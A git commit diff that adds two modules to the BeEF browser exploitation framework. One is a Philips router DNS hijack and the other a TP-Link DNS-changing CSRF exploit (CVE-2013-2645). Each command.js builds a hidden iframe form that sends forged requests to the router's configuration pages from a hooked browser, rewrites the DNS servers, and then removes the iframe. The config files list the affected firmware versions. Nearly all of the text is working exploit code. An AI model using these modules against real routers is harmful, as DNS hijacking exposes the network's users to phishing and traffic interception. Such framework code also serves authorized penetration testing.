Add Philips and TP-Link DNS hijack modules

2015-01-25 18:53:09 +00:00
parent d3165c2d97
commit 5b33389746
6 changed files with 220 additions and 0 deletions
--- a/modules/exploits/router/phillips_dns_hijack/command.js
+++ b/modules/exploits/router/phillips_dns_hijack/command.js
@@ -0,0 +1,74 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var target  = 'http://<%= @rhost %>/cgi-bin/setup_dns.exe';
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns1_1 = parts[0];
+	var dns1_2 = parts[1];
+	var dns1_3 = parts[2];
+	var dns1_4 = parts[3];
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+	}
+	var dns2_1 = parts[0];
+	var dns2_2 = parts[1];
+	var dns2_3 = parts[2];
+	var dns2_4 = parts[3];
+
+	// change DNS
+	var philips_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
+		{'type':'hidden', 'name':'page',   'value':'setup_dns'},
+		{'type':'hidden', 'name':'logout', 'value':''},
+		{'type':'hidden', 'name':'dns1_1', 'value':dns1_1},
+		{'type':'hidden', 'name':'dns1_2', 'value':dns1_2},
+		{'type':'hidden', 'name':'dns1_3', 'value':dns1_3},
+		{'type':'hidden', 'name':'dns1_4', 'value':dns1_4},
+		{'type':'hidden', 'name':'dns2_1', 'value':dns2_1},
+		{'type':'hidden', 'name':'dns2_2', 'value':dns2_2},
+		{'type':'hidden', 'name':'dns2_3', 'value':dns2_3},
+		{'type':'hidden', 'name':'dns2_4', 'value':dns2_4}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(philips_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/phillips_dns_hijack/config.yaml
+++ b/modules/exploits/router/phillips_dns_hijack/config.yaml
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# https://bugzilla.mozilla.org/show_bug.cgi?id=371598
+# http://www.gnucitizen.org/blog/router-hacking-challenge/
+#
+beef:
+    module:
+        philips_dns_hijack:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Philips DNS Hijack"
+            description: "Attempts to change the DNS setting on a Philips router.<br/><br/>Philips routers reportedly do not require authentication to change the DNS servers.<br/><br/>This module has not been tested."
+            authors: ["bob"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/router/phillips_dns_hijack/module.rb
+++ b/modules/exploits/router/phillips_dns_hijack/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+class Philips_dns_hijack < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
--- a/modules/exploits/router/tplink_dns_csrf/command.js
+++ b/modules/exploits/router/tplink_dns_csrf/command.js
@@ -0,0 +1,67 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var dhcp_start = '192.168.1.100';
+	var dhcp_end   = '192.168.1.199';
+	var target  = 'http://<%= @rhost %>/userRpm/LanDhcpServerRpm.htm';
+	var dns1    = '<%= @dns1 %>';
+	var dns2    = '<%= @dns2 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+
+	// validate secondary DNS server IP address
+	var parts = dns2.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+			return;
+		}
+	}
+
+	// change DNS
+	var tplink_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "GET", "application/x-www-form-urlencoded", [
+		{'type':'hidden', 'name':'dhcpserver', 'value':'1'},
+		{'type':'hidden', 'name':'ip1', 'value':dhcp_start},
+		{'type':'hidden', 'name':'ip2', 'value':dhcp_end},
+		{'type':'hidden', 'name':'Lease', 'value':'120'},
+		{'type':'hidden', 'name':'gateway', 'value':'0.0.0.0'},
+		{'type':'hidden', 'name':'domain', 'value':''},
+		{'type':'hidden', 'name':'dnsserver', 'value':dns1},
+		{'type':'hidden', 'name':'dnsserver2', 'value':dns2},
+		{'type':'hidden', 'name':'Save', 'value': unescape('%B1%A3+%B4%E6')}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(tplink_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+
--- a/modules/exploits/router/tplink_dns_csrf/config.yaml
+++ b/modules/exploits/router/tplink_dns_csrf/config.yaml
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# References:
+# CVE-2013-2645
+# http://securityevaluators.com/knowledge/case_studies/routers/tp-link_wr1043n.php
+# http://www.jakoblell.com/blog/2013/10/30/real-world-csrf-attack-hijacks-dns-server-configuration-of-tp-link-routers-2/
+# http://news.softpedia.com/news/Cybercriminals-Exploit-TP-Link-Router-CSRF-Vulnerabilities-to-Hijack-DNS-Settings-395545.shtml
+#
+beef:
+    module:
+        tplink_dns_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "TP-Link DNS Hijack CSRF"
+            description: "Attempts to change the DNS setting on a TP-Link router (WR1043ND, TL-MR3020, TL-WDR3600).<br/><br/>The browser must be have an authenticated session on the router.<br/><br/>The list of affected devices includes:<br/>TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405<br/>TP-Link TL-MR3020 firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n<br/>TL-WDR3600 firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n.<br/><br/>This module has not been tested."
+            authors: ["Jakob Lell", "Jacob Holcomb"]
+            target:
+                unknown: ["ALL"]
--- a/modules/exploits/router/tplink_dns_csrf/module.rb
+++ b/modules/exploits/router/tplink_dns_csrf/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Tplink_dns_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+			{'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end